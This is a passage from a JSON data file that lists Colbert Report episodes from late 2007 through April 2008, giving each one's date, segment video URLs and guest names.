        "http://thecolbertreport.cc.com/videos/rcmqef/craig-newmark",
        "http://thecolbertreport.cc.com/videos/i2rw4t/sign-off---portrait-unveiled"
      ],
      "guest": "Craig Newmark, Anderson Cooper"
    },
    {
      "date": "2007-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3xfeo5/intro---10-29-07",
        "http://thecolbertreport.cc.com/videos/oqlp6f/the-last-infographic",
        "http://thecolbertreport.cc.com/videos/2hfe9b/hail-to-the-cheese---branded-killings",
        "http://thecolbertreport.cc.com/videos/wli1tg/the-word---absinthetinence",
        "http://thecolbertreport.cc.com/videos/49my1v/tip-wag---sleep-deprivation",
        "http://thecolbertreport.cc.com/videos/pmtsjp/richard-berman",
        "http://thecolbertreport.cc.com/videos/1yeaa0/sign-off---rocktober"
      ],
      "guest": "Richard Berman"
    },
    {
      "date": "2007-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6130g5/intro---10-30-07",
        "http://thecolbertreport.cc.com/videos/f3dddn/massie-ritsch",
        "http://thecolbertreport.cc.com/videos/rrhz2o/earth-attacks---georgia-drought",
        "http://thecolbertreport.cc.com/videos/czdur4/j--craig-venter"
      ],
      "guest": "Massie Ritsch, Craig Venter"
    },
    {
      "date": "2007-10-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fjrl1d/intro---10-31-07",
        "http://thecolbertreport.cc.com/videos/iwuly8/hallo-weening",
        "http://thecolbertreport.cc.com/videos/lshob0/democra-see--democra-do---elections",
        "http://thecolbertreport.cc.com/videos/pcplr6/the-word---job-description",
        "http://thecolbertreport.cc.com/videos/hpr411/obama-s-grit-off-challenge",
        "http://thecolbertreport.cc.com/videos/s7cadq/monkey-on-the-lam---lobster-edition",
        "http://thecolbertreport.cc.com/videos/4uxxf3/lawrence-wilkerson"
      ],
      "guest": "Col. Lawrence Wilkerson"
    },
    {
      "date": "2007-11-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/we8h5v/intro---11-1-07",
        "http://thecolbertreport.cc.com/videos/dzscg7/hail-to-the-cheese---ballot-issues",
        "http://thecolbertreport.cc.com/videos/9d4e78/hail-to-the-cheese---democratic-executive-council",
        "http://thecolbertreport.cc.com/videos/tcxqui/walter-kirn",
        "http://thecolbertreport.cc.com/videos/zymn63/hail-to-the-cheese---donors-choose"
      ],
      "guest": "Walter Kirn"
    }
  ],
  "2008": [
    {
      "date": "2008-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3q3gby/intro---1-7-08",
        "http://thecolbertreport.cc.com/videos/cva2to/applause",
        "http://thecolbertreport.cc.com/videos/mdmdd0/nothing-in-the-prompters",
        "http://thecolbertreport.cc.com/videos/lp7qsd/2008-election",
        "http://thecolbertreport.cc.com/videos/ku5oni/the-word--------",
        "http://thecolbertreport.cc.com/videos/mbip8q/democratic-change---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/v60qiq/richard-freeman",
        "http://thecolbertreport.cc.com/videos/ckwp47/first-wrap-up"
      ],
      "guest": "Andrew Sullivan, Richard Freeman"
    },
    {
      "date": "2008-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8ws9bh/self-driving-car",
        "http://thecolbertreport.cc.com/videos/2785cy/bush-absolutely-optimistic",
        "http://thecolbertreport.cc.com/videos/2hhoxp/meteorite-market",
        "http://thecolbertreport.cc.com/videos/ljxmh2/chris-beam",
        "http://thecolbertreport.cc.com/videos/tl8ofm/gary-rosen",
        "http://thecolbertreport.cc.com/videos/m7kpci/note-to-strikers"
      ],
      "guest": "Chris Beam, Gary Rosen"
    },
    {
      "date": "2008-01-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/33bwbo/she-won-",
        "http://thecolbertreport.cc.com/videos/fu1w6p/new-hampshire-wrap-up",
        "http://thecolbertreport.cc.com/videos/weeodm/mike-huckabee",
        "http://thecolbertreport.cc.com/videos/d0g8tk/matt-taibbi",
        "http://thecolbertreport.cc.com/videos/je02b9/studio-on-fire"
      ],
      "guest": "Gov. Mike Huckabee, Matt Taibbi"
    },
    {
      "date": "2008-01-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/613lgd/un-american-news---primaries",
        "http://thecolbertreport.cc.com/videos/s269t4/norman-ornstein",
        "http://thecolbertreport.cc.com/videos/y7lisr/national-treasure-pt--1",
        "http://thecolbertreport.cc.com/videos/x10j2p/muhammad-yunus",
        "http://thecolbertreport.cc.com/videos/ypiss3/to-the-writers"
      ],
      "guest": "Norman Ornstein, Muhammad Yunus"
    },
    {
      "date": "2008-01-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pm5v1p/papa-bear-takes-note",
        "http://thecolbertreport.cc.com/videos/1vwzy6/around-the-world-in-11-6-seconds---lo-mein",
        "http://thecolbertreport.cc.com/videos/7k6fkq/indecision-2008--don-t-f--k-this-up-america---trustworthy-manner",
        "http://thecolbertreport.cc.com/videos/dytre7/national-treasure-pt--2",
        "http://thecolbertreport.cc.com/videos/xgsf42/neil-shubin",
        "http://thecolbertreport.cc.com/videos/tmke9w/digesting-lo-mein"
      ],
      "guest": "Neil Shubin"
    },
    {
      "date": "2008-01-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4wimo2/who-s-riding-my-coattails-now----vince-vaughn",
        "http://thecolbertreport.cc.com/videos/hrzpve/peter-hopkins",
        "http://thecolbertreport.cc.com/videos/1m3t4h/national-treasure-pt--3",
        "http://thecolbertreport.cc.com/videos/b0e6w3/jared-cohen",
        "http://thecolbertreport.cc.com/videos/4f2fw9/parting-shot"
      ],
      "guest": "Peter Hopkins, Jared Cohen"
    },
    {
      "date": "2008-01-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6mjra2/primary-update",
        "http://thecolbertreport.cc.com/videos/ng3cbb/political-roulette-pt--1",
        "http://thecolbertreport.cc.com/videos/v0glj4/back-off-mike-huckabee",
        "http://thecolbertreport.cc.com/videos/zlpayq/deborah-tannen"
      ],
      "guest": "Deborah Tannen"
    },
    {
      "date": "2008-01-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0tl5ul/push-polling",
        "http://thecolbertreport.cc.com/videos/phko2g/political-roulette-pt--2",
        "http://thecolbertreport.cc.com/videos/xj86rv/lou-dobbs",
        "http://thecolbertreport.cc.com/videos/ykpl7i/david-levy"
      ],
      "guest": "Lou Dobbs, David Levy"
    },
    {
      "date": "2008-01-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3xkco0/nevada-caucus",
        "http://thecolbertreport.cc.com/videos/qznknb/huckabee-s-message",
        "http://thecolbertreport.cc.com/videos/i2josd/allan-sloan",
        "http://thecolbertreport.cc.com/videos/wjtmux/better-know-a-governor---mark-sanford",
        "http://thecolbertreport.cc.com/videos/ia8xzl/eric-weiner"
      ],
      "guest": "Allan Sloan, Eric Weiner"
    },
    {
      "date": "2008-01-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8q1hh4/dow-drop",
        "http://thecolbertreport.cc.com/videos/7cp97e/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/xw3v9i/andrew-young",
        "http://thecolbertreport.cc.com/videos/5tvl4o/let-my-people-go"
      ],
      "guest": "Malcolm Gladwell, Andrew Young"
    },
    {
      "date": "2008-01-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1vjtzq/fred-thompson-out",
        "http://thecolbertreport.cc.com/videos/1fbgf9/sport-report---tom-brady-s-injury",
        "http://thecolbertreport.cc.com/videos/08lghg/big-check",
        "http://thecolbertreport.cc.com/videos/wmftq8/jeb-corliss",
        "http://thecolbertreport.cc.com/videos/rp759h/andrew-mclean"
      ],
      "guest": "Marie Wood, Jeb Corliss, Andrew McLean"
    },
    {
      "date": "2008-01-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7uwyyh/rudy-in-florida",
        "http://thecolbertreport.cc.com/videos/xoh710/clinton-s-hero",
        "http://thecolbertreport.cc.com/videos/swzg9r/debra-dickerson",
        "http://thecolbertreport.cc.com/videos/0wz55a/south-carolina-debate",
        "http://thecolbertreport.cc.com/videos/bpcnyw/charles-nesson"
      ],
      "guest": "Debra Dickerson, Charles Nesson"
    },
    {
      "date": "2008-01-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/na6amv/obama-just-like-jfk",
        "http://thecolbertreport.cc.com/videos/zvtkxx/gordon-b--hinckley-died",
        "http://thecolbertreport.cc.com/videos/07hrs5/marjane-satrapi",
        "http://thecolbertreport.cc.com/videos/wrdlsf/south-carolina---what-could-have-been-",
        "http://thecolbertreport.cc.com/videos/l1477t/rick-warren"
      ],
      "guest": "Marjane Satrapi, Rick Warren"
    },
    {
      "date": "2008-01-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aeooxe/googley-eyed-clams",
        "http://thecolbertreport.cc.com/videos/laposi/joe-quesada",
        "http://thecolbertreport.cc.com/videos/xw6ugs/french-clam",
        "http://thecolbertreport.cc.com/videos/38i4eg/alex-ross"
      ],
      "guest": "Joe Quesada, Alex Ross"
    },
    {
      "date": "2008-01-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/akx9de/exclusive---better-know-a-district---south-carolina-s-4th---bob-inglis",
        "http://thecolbertreport.cc.com/videos/t6sflk/florida-primary",
        "http://thecolbertreport.cc.com/videos/vb4t2x/carl-hiaasen",
        "http://thecolbertreport.cc.com/videos/n87g1n/better-know-a-district---south-carolina-s-4th---bob-inglis",
        "http://thecolbertreport.cc.com/videos/m4iax5/frans-de-waal"
      ],
      "guest": "Carl Hiaasen, Frans de Waal"
    },
    {
      "date": "2008-01-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z0raub/timetables",
        "http://thecolbertreport.cc.com/videos/8l0ndt/ron-paul-sounds-alarm",
        "http://thecolbertreport.cc.com/videos/2lwxda/tim-harford",
        "http://thecolbertreport.cc.com/videos/0d4uq9/people-who-are-destroying-america---pick-up-trucks",
        "http://thecolbertreport.cc.com/videos/kgrty6/andrew-napolitano"
      ],
      "guest": "Tim Harford, Andrew Napolitano"
    },
    {
      "date": "2008-02-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pwg4p2/conan-and-jon",
        "http://thecolbertreport.cc.com/videos/y5zzyu/tony-campolo",
        "http://thecolbertreport.cc.com/videos/tmuhtk/jacob-weisberg",
        "http://thecolbertreport.cc.com/videos/7r0nt2/post-show-ass-kicking"
      ],
      "guest": "Tony Campolo, Jacob Weisberg"
    },
    {
      "date": "2008-02-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yvxknz/happy-super-tuesday-",
        "http://thecolbertreport.cc.com/videos/nqwcui/hillary-is-a-target",
        "http://thecolbertreport.cc.com/videos/xonm3y/angelo-falcon",
        "http://thecolbertreport.cc.com/videos/xq9nc4/mukasey-on-torture",
        "http://thecolbertreport.cc.com/videos/gjwjsl/bob-dole"
      ],
      "guest": "Angelo Falcon, Bob Dole"
    },
    {
      "date": "2008-02-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/j3dp2u/late-night-fight",
        "http://thecolbertreport.cc.com/videos/gqstf6/clap-clap-point-point",
        "http://thecolbertreport.cc.com/videos/yxx0w5/richard-brookhiser",
        "http://thecolbertreport.cc.com/videos/ammxmv/better-know-a-lobby---human-rights-campaign-pt--1",
        "http://thecolbertreport.cc.com/videos/nhkpwj/tad-devine"
      ],
      "guest": "Tad Devine"
    },
    {
      "date": "2008-02-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ctzo98/stephen-s-ethnic-minute",
        "http://thecolbertreport.cc.com/videos/v43el0/huckabee-s-still-in",
        "http://thecolbertreport.cc.com/videos/negp2q/better-know-a-lobby---human-rights-campaign-pt--2",
        "http://thecolbertreport.cc.com/videos/oxf63b/mark-moffett"
      ],
      "guest": "Mark Moffett"
    },
    {
      "date": "2008-02-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bs8egm/obama-wins-a-grammy",
        "http://thecolbertreport.cc.com/videos/lnkbna/goodbye-mitt",
        "http://thecolbertreport.cc.com/videos/myptag/aubrey-de-grey",
        "http://thecolbertreport.cc.com/videos/in3tg3/portrait-check-in",
        "http://thecolbertreport.cc.com/videos/8sjpoa/philip-zimbardo"
      ],
      "guest": "Aubrey de Grey, Philip Zimbardo"
    },
    {
      "date": "2008-02-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gucgvs/huckabee-s-obligation",
        "http://thecolbertreport.cc.com/videos/6g98j7/eliot-spitzer",
        "http://thecolbertreport.cc.com/videos/udbv19/eleanor-holmes-norton",
        "http://thecolbertreport.cc.com/videos/ekpicq/lisa-randall"
      ],
      "guest": "Gov. Eliot Spitzer, Eleanor Holmes Norton, Lisa Randall"
    },
    {
      "date": "2008-02-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r9rjo5/intro---2-13-08",
        "http://thecolbertreport.cc.com/videos/mvp1nc/the-writers-return-",
        "http://thecolbertreport.cc.com/videos/n3dwin/david-gracer",
        "http://thecolbertreport.cc.com/videos/aebxex/neil-de-grasse-tyson",
        "http://thecolbertreport.cc.com/videos/n39iqt/richard-thompson-ford"
      ],
      "guest": "David Gracer, Richard Thompson Ford"
    },
    {
      "date": "2008-02-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5hf18t/intro---2-14-08",
        "http://thecolbertreport.cc.com/videos/qg63hg/who-s-riding-my-coattails-now----oliver-pocher",
        "http://thecolbertreport.cc.com/videos/slbgcr/clemens-hearing",
        "http://thecolbertreport.cc.com/videos/0i3hg8/john-feinstein",
        "http://thecolbertreport.cc.com/videos/dmxs6z/people-who-are-destroying-america---happy-meal",
        "http://thecolbertreport.cc.com/videos/hxt6mo/leonard-nimoy"
      ],
      "guest": "John Feinstein, Leonard Nimoy"
    },
    {
      "date": "2008-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t6xzxc/intro---2-26-08",
        "http://thecolbertreport.cc.com/videos/cexk3g/obama-s-photo",
        "http://thecolbertreport.cc.com/videos/x6h69l/the-word---good-bad-journalism",
        "http://thecolbertreport.cc.com/videos/4s0owa/henry-louis-gates-jr-"
      ],
      "guest": "Henry Louis Gates Jr."
    },
    {
      "date": "2008-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3uzan2/exclusive---guitar-heroes",
        "http://thecolbertreport.cc.com/videos/spigs3/intro---2-27-08",
        "http://thecolbertreport.cc.com/videos/fb142a/mccain-rally",
        "http://thecolbertreport.cc.com/videos/717g03/threatdown---air-colbert",
        "http://thecolbertreport.cc.com/videos/ni7mzt/tony-snow"
      ],
      "guest": "Tony Snow"
    },
    {
      "date": "2008-02-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/upjayy/the-music-man",
        "http://thecolbertreport.cc.com/videos/80mnx9/intro---2-28-08",
        "http://thecolbertreport.cc.com/videos/wq9qga/russian-billboard",
        "http://thecolbertreport.cc.com/videos/c64r8o/cold-war-update",
        "http://thecolbertreport.cc.com/videos/zrhp7w/richard-brookhiser",
        "http://thecolbertreport.cc.com/videos/n7g9t0/ingrid-newkirk",
        "http://thecolbertreport.cc.com/videos/zsj0rq/sign-off---shoe-phone"
      ],
      "guest": "Richard Brookhiser, Ingrid Newkirk"
    },
    {
      "date": "2008-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/laopsy/intro---3-3-08",
        "http://thecolbertreport.cc.com/videos/1gyoec/the-coveted-colbert-bump",
        "http://thecolbertreport.cc.com/videos/do24ht/das-booty---hitler-s-gold-pt--1",
        "http://thecolbertreport.cc.com/videos/dvfqt3/maestro-lorin-maazel",
        "http://thecolbertreport.cc.com/videos/8llta1/shashi-tharoor",
        "http://thecolbertreport.cc.com/videos/beqjns/leap-day"
      ],
      "guest": "Lorin Maazel, Shashi Tharoor"
    },
    {
      "date": "2008-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1d4djp/intro---3-4-08",
        "http://thecolbertreport.cc.com/videos/509s01/william-donohue",
        "http://thecolbertreport.cc.com/videos/myyov6/howard-dean",
        "http://thecolbertreport.cc.com/videos/wvt9ny/nailed--em---graffiti-punk",
        "http://thecolbertreport.cc.com/videos/86yukf/jennifer-8--lee",
        "http://thecolbertreport.cc.com/videos/10okbb/to-howard-dean",
        "http://thecolbertreport.cc.com/videos/q08fbb/the-word---experience"
      ],
      "guest": "William Donohue, Howard Dean, Jennifer 8. Lee"
    },
    {
      "date": "2008-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9o2e4d/intro---3-5-08",
        "http://thecolbertreport.cc.com/videos/d60bre/farewell-brett-favre",
        "http://thecolbertreport.cc.com/videos/q038rv/hucka-bye",
        "http://thecolbertreport.cc.com/videos/6296yb/robert-reich",
        "http://thecolbertreport.cc.com/videos/lrlzri/difference-makers---free-implants",
        "http://thecolbertreport.cc.com/videos/z6yixf/gregory-rodriguez",
        "http://thecolbertreport.cc.com/videos/p6i1w8/r-i-p--gary-gygax"
      ],
      "guest": "Robert Reich, Gregory Rodriguez"
    },
    {
      "date": "2008-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zoimd4/intro---3-6-08",
        "http://thecolbertreport.cc.com/videos/m9ob1y/hot-dog-with-the-president",
        "http://thecolbertreport.cc.com/videos/i9idne/the-word---at---treason",
        "http://thecolbertreport.cc.com/videos/0ih0ea/cheating-death---surgery",
        "http://thecolbertreport.cc.com/videos/cv6bwa/john-legend"
      ],
      "guest": "John Legend"
    },
    {
      "date": "2008-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mahtb2/intro---3-10-08",
        "http://thecolbertreport.cc.com/videos/3a9bum/whores-",
        "http://thecolbertreport.cc.com/videos/8p3t8b/the-word---size-matters",
        "http://thecolbertreport.cc.com/videos/fdo5yd/the--72-democrats",
        "http://thecolbertreport.cc.com/videos/7m46n6/george-mcgovern"
      ],
      "guest": "George McGovern"
    },
    {
      "date": "2008-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ybl08/intro---3-11-08",
        "http://thecolbertreport.cc.com/videos/me89dy/spitzer-greeting-cards",
        "http://thecolbertreport.cc.com/videos/twuo43/the-word---mr--right-now",
        "http://thecolbertreport.cc.com/videos/f7ltv5/colbert-platinum---liechtenstein",
        "http://thecolbertreport.cc.com/videos/gcwzrr/geraldo-rivera",
        "http://thecolbertreport.cc.com/videos/8h6jvx/sign-off---show-s-over--america"
      ],
      "guest": "Geraldo Rivera"
    },
    {
      "date": "2008-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tvzv05/intro---3-12-08",
        "http://thecolbertreport.cc.com/videos/ntzxtt/spitzer-sandwich",
        "http://thecolbertreport.cc.com/videos/ippftn/smokin--pole---alaska",
        "http://thecolbertreport.cc.com/videos/50a47x/better-know-a-lobby---drug-policy-alliance",
        "http://thecolbertreport.cc.com/videos/nouiem/howard-kurtz"
      ],
      "guest": "Howard Kurtz"
    },
    {
      "date": "2008-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gpd5cu/intro---3-13-08",
        "http://thecolbertreport.cc.com/videos/k8bsjv/airborne-lawsuit",
        "http://thecolbertreport.cc.com/videos/d51tqz/democralypse-now---ferraro",
        "http://thecolbertreport.cc.com/videos/tvjvip/hussein-ibish",
        "http://thecolbertreport.cc.com/videos/oe7yd2/difference-makers---doug-jackson",
        "http://thecolbertreport.cc.com/videos/mzut29/sudhir-venkatesh"
      ],
      "guest": "Hussein Ibish, Sudhir Venkatesh"
    },
    {
      "date": "2008-03-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ck2j7u/exclusive---spitzer",
        "http://thecolbertreport.cc.com/videos/8zfc9q/intro---3-17-08",
        "http://thecolbertreport.cc.com/videos/v28dea/stephen-in-philly",
        "http://thecolbertreport.cc.com/videos/rxdrv8/the-word---the-audacity-of-hopelessness",
        "http://thecolbertreport.cc.com/videos/tw4jo4/people-who-are-destroying-america---st--patrick-s-day",
        "http://thecolbertreport.cc.com/videos/5j8sg4/samantha-power"
      ],
      "guest": "Samantha Power"
    },
    {
      "date": "2008-03-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vgwiie/intro---3-18-08",
        "http://thecolbertreport.cc.com/videos/wsz08m/yes-we-can-",
        "http://thecolbertreport.cc.com/videos/xtwx8p/spicy-sweet-coverage",
        "http://thecolbertreport.cc.com/videos/mogf73/das-booty---hitler-s-gold-pt--2",
        "http://thecolbertreport.cc.com/videos/5boih5/carole-king"
      ],
      "guest": "Carole King"
    },
    {
      "date": "2008-03-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hcafrk/intro---3-19-08",
        "http://thecolbertreport.cc.com/videos/hrjm1z/patterson-affair",
        "http://thecolbertreport.cc.com/videos/scqdwy/the-word---the-gospel-of-john",
        "http://thecolbertreport.cc.com/videos/y6aybj/pennsylvania-primary",
        "http://thecolbertreport.cc.com/videos/037ygf/tip-wag---afghanistan",
        "http://thecolbertreport.cc.com/videos/vk922m/dee-dee-myers"
      ],
      "guest": "Dee Dee Myers"
    },
    {
      "date": "2008-03-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vq76dq/watershift-down--getting-the-sea-monkey-off-america-s-aqua-back",
        "http://thecolbertreport.cc.com/videos/wkdrt1/aqua-colbert",
        "http://thecolbertreport.cc.com/videos/l1sl1c/water-is-life",
        "http://thecolbertreport.cc.com/videos/3mtvfm/dean-kamen",
        "http://thecolbertreport.cc.com/videos/4y9sds/setting-water-on-fire"
      ],
      "guest": "Dean Kamen"
    },
    {
      "date": "2008-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f3rbbv/intro---3-31-08",
        "http://thecolbertreport.cc.com/videos/aqkiox/opening-day",
        "http://thecolbertreport.cc.com/videos/0fo1qd/bowling-in-pa",
        "http://thecolbertreport.cc.com/videos/2ii77j/eric-alterman",
        "http://thecolbertreport.cc.com/videos/b149k1/tek-jansen---beginning-s-first-dawn--episode-one-revisited",
        "http://thecolbertreport.cc.com/videos/3p6caw/michael-reynolds"
      ],
      "guest": "Eric Alterman, Michael Reynolds"
    },
    {
      "date": "2008-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ayieu5/intro---4-1-08",
        "http://thecolbertreport.cc.com/videos/irlo9m/portrait-update",
        "http://thecolbertreport.cc.com/videos/inwuqm/the-word---pick-sicks",
        "http://thecolbertreport.cc.com/videos/fpyy9k/bears---balls---rat-rakes",
        "http://thecolbertreport.cc.com/videos/700kdb/van-jones",
        "http://thecolbertreport.cc.com/videos/lrepiq/portrait-displayed"
      ],
      "guest": "Van Jones"
    },
    {
      "date": "2008-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/46s8py/intro---4-2-08",
        "http://thecolbertreport.cc.com/videos/sbidx5/stephen-wins-a-peabody",
        "http://thecolbertreport.cc.com/videos/3fc86e/threatdown---nipples",
        "http://thecolbertreport.cc.com/videos/n3f5qh/r-e-m-"
      ],
      "guest": "R.E.M."
    },
    {
      "date": "2008-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aj43z8/intro---4-3-08",
        "http://thecolbertreport.cc.com/videos/tyapiy/peabody-credit",
        "http://thecolbertreport.cc.com/videos/xwlefp/the-word---let-the-games-begin",
        "http://thecolbertreport.cc.com/videos/gx1oov/tek-jansen---beginning-s-first-dawn--episode-two",
        "http://thecolbertreport.cc.com/videos/dm9a7h/clay-shirky",
        "http://thecolbertreport.cc.com/videos/jsqez9/tek-jansen---you-are-the-best"
      ],
      "guest": "Clay Shirky"
    },
    {
      "date": "2008-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7lye0f/intro---4-7-08",
        "http://thecolbertreport.cc.com/videos/we6e20/r-i-p--charlton-heston",
        "http://thecolbertreport.cc.com/videos/xh2gv1/trevor-paglen",
        "http://thecolbertreport.cc.com/videos/3xlgs3/democralypse-now---3am",
        "http://thecolbertreport.cc.com/videos/82gipv/jesse-ventura"
      ],
      "guest": "Trevor Paglen, Jesse Ventura"
    },
    {
      "date": "2008-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/54jfl6/intro---4-8-08",
        "http://thecolbertreport.cc.com/videos/yme30m/pope-coming-to-nyc",
        "http://thecolbertreport.cc.com/videos/g0ke6u/children-s-drawings",
        "http://thecolbertreport.cc.com/videos/0dimmt/wilford-brimley-calls---donation",
        "http://thecolbertreport.cc.com/videos/elawer/madeleine-albright"
      ],
      "guest": "Madeleine Albright"
    },
    {
      "date": "2008-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bdme3x/intro---4-9-08",
        "http://thecolbertreport.cc.com/videos/iekisu/olympic-torch",
        "http://thecolbertreport.cc.com/videos/ypse7c/the-word---starter-country",
        "http://thecolbertreport.cc.com/videos/jycq7p/cheating-death---sexual-health",
        "http://thecolbertreport.cc.com/videos/nlvpn4/jeff-gore"
      ],
      "guest": "Jeff Gore"
    },
    {
      "date": "2008-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zsmonm/intro---4-10-08",
        "http://thecolbertreport.cc.com/videos/6sdfwa/petraeus-hearings",
        "http://thecolbertreport.cc.com/videos/x8pxwi/more-drawings-from-kids",
        "http://thecolbertreport.cc.com/videos/z2z65o/the-word---black-and-white",
        "http://thecolbertreport.cc.com/videos/v1k50e/tip-wag---rain",
        "http://thecolbertreport.cc.com/videos/torkh7/robin-wright"
      ],
      "guest": "Robin Wright"
    },
    {
      "date": "2008-04-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qfrdo9/from-philadelphia",
        "http://thecolbertreport.cc.com/videos/5phute/pennsylvania-primary-history",
        "http://thecolbertreport.cc.com/videos/1b60fj/chris-matthews"
      ],
      "guest": "Chris Matthews"
    },
    {
      "date": "2008-04-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oj9blc/intro---4-15-08",
        "http://thecolbertreport.cc.com/videos/3aqwqx/nice-roomba",
        "http://thecolbertreport.cc.com/videos/ad5qga/the-word---tradition",
        "http://thecolbertreport.cc.com/videos/7unrts/independence-park",
        "http://thecolbertreport.cc.com/videos/upl7xe/michelle-obama"
      ],
      "guest": "Michelle Obama, The Roots"
    },
    {
      "date": "2008-04-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h0lfw9/intro---4-16-08",
        "http://thecolbertreport.cc.com/videos/pi51oz/jackie-o--amendment",
        "http://thecolbertreport.cc.com/videos/9z3000/democralypse-now---the-boss",
        "http://thecolbertreport.cc.com/videos/9zm7cy/national-constitution-center",
        "http://thecolbertreport.cc.com/videos/51r39w/ed-rendell",
        "http://thecolbertreport.cc.com/videos/1bzrgk/benjamin-franklin-s-news"
      ],
      "guest": "Philadelphia Eagles Cheerleaders, Gov. Ed Rendell"
    },
    {
      "date": "2008-04-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ky7oxg/benjamin-franklin-s-latest-invention",
        "http://thecolbertreport.cc.com/videos/uzusr0/hillary-clinton-takes-on-technical-difficulties",
        "http://thecolbertreport.cc.com/videos/1i62sd/clinton-vs--obama-philadelphia-debate-review",
        "http://thecolbertreport.cc.com/videos/ew5t9y/patrick-murphy",
        "http://thecolbertreport.cc.com/videos/x3zme5/the-ed-words---valued-voter",
        "http://thecolbertreport.cc.com/videos/ol0nn3/on-notice---barack-obama-against-distractions"
      ],
      "guest": "Hillary Clinton, John Edwards, Barack Obama"
    },
    {
      "date": "2008-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i6ihlp/intro---4-21-08",
        "http://thecolbertreport.cc.com/videos/foffke/philly-loves-colbert-nation",
        "http://thecolbertreport.cc.com/videos/5jm58y/global-food-shortage",
        "http://thecolbertreport.cc.com/videos/ehgxth/father-james-martin",
        "http://thecolbertreport.cc.com/videos/oo6wpp/bernie-sanders",
        "http://thecolbertreport.cc.com/videos/e7gpah/farewell-to-bobby"
      ],
      "guest": "Fr. James Martin, Sen. Bernie Sanders"
    },
    {
      "date": "2008-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ah79bq/intro---4-22-08",
        "http://thecolbertreport.cc.com/videos/tp640v/earth-is-awesome",
        "http://thecolbertreport.cc.com/videos/uyxyc7/obama-copycattery",
        "http://thecolbertreport.cc.com/videos/a2ha6c/indecision-cheesesteaks",
        "http://thecolbertreport.cc.com/videos/0nsiap/better-know-a-district---pennsylvania-s-7th---joe-sestak",
        "http://thecolbertreport.cc.com/videos/5427ng/susan-jacoby",
        "http://thecolbertreport.cc.com/videos/l34czb/exclusive---better-know-a-district---pennsylvania-s-7th---joe-sestak"
      ],
      "guest": "Susan Jacoby"
    },
    {
      "date": "2008-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lxpsri/intro---4-23-08",
        "http://thecolbertreport.cc.com/videos/6wperh/rain-rivalry-challenge",
        "http://thecolbertreport.cc.com/videos/hpr26d/the-word---iraq-the-vote",
        "http://thecolbertreport.cc.com/videos/fqo64s/colbert-platinum---cat-pooped-coffee",
        "http://thecolbertreport.cc.com/videos/5azl7m/mitch-albom",
        "http://thecolbertreport.cc.com/videos/qdf6zq/the-lost-o-reilly-tapes-pt--1"
      ],
      "guest": "Mitch Albom"
    },
    {
      "date": "2008-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6kux9r/intro---4-24-08",
        "http://thecolbertreport.cc.com/videos/a1qle2/petraeus--promotion",
        "http://thecolbertreport.cc.com/videos/uddwea/threatdown---juicing-bulls",
        "http://thecolbertreport.cc.com/videos/e3l9yt/difference-makers---bumbot",
        "http://thecolbertreport.cc.com/videos/lr9uai/maria-shriver"
      ],
      "guest": "Maria Shriver"
    },
    {
      "date": "2008-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3fwic4/intro---4-28-08",
        "http://thecolbertreport.cc.com/videos/244o0l/miley-cyrus-photo-shoot",
